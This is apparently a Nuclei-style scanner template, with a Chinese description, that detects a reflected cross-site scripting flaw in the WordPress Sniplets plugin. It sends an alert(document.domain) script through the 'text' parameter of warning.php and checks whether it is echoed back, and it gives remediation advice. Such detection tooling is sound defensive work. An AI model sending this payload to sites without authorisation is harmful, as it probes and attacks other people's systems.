id: sniplets-xss
info:
  name: Wordpress Plugin Sniplets - Cross-Site Scripting
  author:
  - l0ne1y
  description: |-
    Wordpress Plugin Sniplets 跨站脚本漏洞
    WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

    Wordpress Plugin Sniplets 存在跨站脚本漏洞，该漏洞源于插件不会清理和转义重置密码表单上的参数。攻击者利用该漏洞可以执行跨站脚本攻击。
  severity: medium
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/

    临时修复方案：
    1、对输入(和URL参数)进行过滤，对输出进行编码，白名单和黑名单结合。也就是对提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容；然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过，但是也还是会拦截很大一部分的XSS攻击；最后对字符进行白名单或者黑名单限制。
requests:
- matchers:
  - type: dsl
    dsl:
    - contains(body,"</script><script>alert(document.domain)</script>") && !contains(body,"/wp-content/plugins/sniplets/view/sniplets/warning.php")
      && status_code==200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
  method: GET
  req-condition: true
